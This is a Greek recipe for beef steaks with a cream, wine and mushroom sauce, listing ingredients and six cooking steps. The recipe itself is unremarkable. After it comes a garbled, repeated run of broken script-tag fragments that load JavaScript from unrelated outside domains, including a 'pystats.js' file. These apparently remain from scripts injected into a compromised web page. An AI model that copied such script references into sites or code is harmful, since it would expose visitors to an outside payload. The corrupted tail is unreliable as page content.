Μπριζόλες με λευκή σάλτσα και μανιτάρια

Steak

Μπριζόλες με λευκή σάλτσα και μανιτάρια που λιώνουν στο στόμα!!!Εύκολο και γευστικό πιάτο.

Υλικά για 2-4 άτομα

  • 1/4 φλιτζάνι κόκκινο κρασί
  • 1 φλιτζάνι τσαγιού κρέμα γάλακτος
  • αλάτι, πιπέρι
  • 4 μπριζόλες μοσχαρίσιες
  • λίγο αλεύρι
  • 50 γραμμάρια βούτυρο
  • 150 γραμμάρια μανιτάρια

Εκτέλεση

  1. Βάζετε στις μπριζόλες αλάτι, πιπέρι και αλεύρι. Λιώνετε το βούτυρο στην κατσαρόλα και ροδίζετε τις μπριζόλες και από τις 2 μεριές για 4 λεπτά από την κάθε μεριά.
  2. Ψήνετε για 30 λεπτά περίπου ή μαγειρεύετε 12 λεπτά σε χύτρα.
  3. Στο τέλος βγάζετε τις μπριζόλες και τις τοποθετείτε σε μια πιατέλα.
  4. Βάζετε τα μανιτάρια σε ένα τηγανάκι και τα αφήνετε να μαραθούν για 5 λεπτά.
  5. Προσθέτετε την κρέμα, το κρασί και αλατοπίπερο και τα αφήνετε να πάρουν μια βράση.
  6. Περιχύνετε τις μπριζόλες με τη σάλτσα και σερβίρετε!

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >